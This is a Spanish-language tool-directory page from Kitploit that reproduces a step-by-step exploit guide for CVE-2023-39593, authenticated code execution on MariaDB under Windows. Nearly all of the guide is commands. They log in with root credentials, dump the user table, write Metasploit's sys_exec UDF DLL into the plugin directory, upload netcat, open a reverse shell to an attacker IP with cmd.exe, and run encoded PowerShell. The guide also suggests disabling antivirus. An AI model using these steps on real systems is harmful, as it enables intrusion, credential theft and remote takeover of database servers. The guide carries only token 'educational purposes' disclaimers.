Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-39593 — Ejecución de código autenticada por base de datos | Kitploit
Herramientas/GitHubGitHub/ant1sec-ops/cve-2023-39593
Escalada de PrivilegiosExplotaciónPost-ExplotaciónPruebas de PenetraciónComando y ControlAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de PayloadsSeguridad de Bases de Datos
GitHubant1sec-ops/cve-2023-39593

CVE-2023-39593

Ejecución de código autenticada por base de datos

23hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

MariaDB 10.5 Ejecución de código autenticado - sys_exec

Esta guía proporciona instrucciones detalladas para explotar una vulnerabilidad de Función Definida por el Usuario (UDF) en MariaDB en un servidor remoto. Estos pasos incluyen la descarga y ejecución de código malicioso en un sistema de base de datos vulnerable.

Advertencia: Este documento es solo para fines educativos. El uso no autorizado de estas técnicas es ilegal y poco ético.

Pasos para reproducir el ataque

1. Conectarse al host remoto de MariaDB

Use el siguiente comando para conectarse al servidor MySQL:

root@kitploit:~
mysql -h 192.168.214.129 -u root -pPassw0rd!

2. Verificar la versión de MariaDB

Para determinar la versión de MySQL en ejecución, ejecute:

root@kitploit:~
select @@version;

3. Listar todos los usuarios

Para ver el usuario actual conectado:

root@kitploit:~
select user();

4. Volcar toda la información sobre el usuario root

Recupere todos los detalles relacionados con el usuario root:

root@kitploit:~
select * from mysql.user where user='root';

5. Verificar privilegios del usuario

Determine qué privilegios tiene el usuario actual:

root@kitploit:~
show grants;

6. Verificar la arquitectura del sistema

Determine si la arquitectura del sistema es vulnerable a UDF:

root@kitploit:~
select @@version_compile_os, @@version_compile_machine;

7. Verificar el directorio de plugins

Identifique el directorio de plugins donde se pueden cargar archivos UDF:

root@kitploit:~
select @@plugin_dir;

8. Copiar la DLL de 32 bits

Copie la DLL de 32 bits desde el directorio de exploits de Metasploit:

root@kitploit:~
ls /usr/share/metasploit-framework/data/exploits/mysql/
cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll udf.dll

9. Convertir la DLL a formato Base64

Codifique el archivo udf.dll en formato base64:

root@kitploit:~
cat udf.dll | base64 | tr -d '\n' > udf.base64

10. Transferir la DLL al servidor MySQL

Copie el valor base64 de udf.base64 y transfiéralo al servidor MySQL:

Abra udf.base64 en un editor de texto:

root@kitploit:~
leafpad udf.base64

En MariaDB, ejecute:

root@kitploit:~
select from_base64("base64 value") into dumpfile 'C:\\Program Files\\MariaDB 10.4\\lib\\plugin\\udf.dll';

Alternativamente, use la siguiente ruta si es necesario:

root@kitploit:~
C:\Program Files\MariaDB 11.1\lib\plugin\

11. Cargar la función UDF en MariaDB

Ejecute el siguiente comando en MariaDB para crear una nueva función:

root@kitploit:~
create function sys_exec returns int soname 'udf.dll';

Nota: También puede usar sys_eval, sys_get, do_system o sys_bineval. Asegúrese de usar int y no into.

12. Verificar la instalación de UDF

Verifique si la función UDF se instaló correctamente:

root@kitploit:~
select * from mysql.func;

13. Preparar el binario de Netcat

Copie el ejecutable de Netcat a su directorio local y codifíquelo en base64:

root@kitploit:~
cp /usr/share/windows-binaries/nc.exe .
cat nc.exe | base64 | tr -d '\n' > nc.base64

14. Transferir Netcat al servidor MariaDB

Abra nc.base64 en un editor de texto:

root@kitploit:~
leafpad nc.base64

Luego, en MySQL:

root@kitploit:~
select from_base64("base64valueofNc.exe") into dumpfile 'C:\\Program Files\\MariaDB 10.5\\lib\\plugin\\nc.exe';

Alternativamente, puede subirlo directamente usando:

root@kitploit:~
mysql -u root -p -h 192.168.214.129 < nc.base64

15. Ejecutar Netcat para una shell inversa

Active el listener de Netcat en el puerto 443:

root@kitploit:~
sudo nc -nlvp 443

Ejecute Netcat en el servidor remoto para una shell inversa:

root@kitploit:~
select sys_exec('C:\\Program Files\\MariaDB 10.4\\lib\\plugin\\nc.exe 192.168.214.128 443 -e cmd.exe');

Nota: Este paso puede ser bloqueado por Windows Defender u otro software antivirus. Considere usar comandos codificados de PowerShell (powershellbase64) y asegúrese de que Defender esté desactivado.

16. Ejecutar comandos de PowerShell

Ejecute un comando de PowerShell usando codificación base64:

root@kitploit:~
select sys_exec('powershellbase64');

NOTA: Puede obtener privilegios de NT AUTHORITY\SYSTEM en muchos casos.

Información adicional

  • Eliminar función: Para eliminar cualquier función UDF creada:

    root@kitploit:~
    drop function sys_get;
    
  • Verificar Local Infile: Verifique si la escritura local está habilitada:

    root@kitploit:~
    show variables like 'local_infile';
    
  • Encontrar usuarios con privilegio de inserción: Identifique qué usuarios tienen el privilegio de inserción:

    root@kitploit:~
    use mysql;
    select user from user where insert_priv='Y' and Host='%';
    

Descargo de responsabilidad: Este documento está destinado únicamente a fines educativos e investigación de seguridad. El uso indebido de esta información puede resultar en cargos penales y sanciones legales severas. Siempre obtenga permiso de las autoridades pertinentes antes de probar cualquier vulnerabilidad en una red o sistema.

Descargar herramienta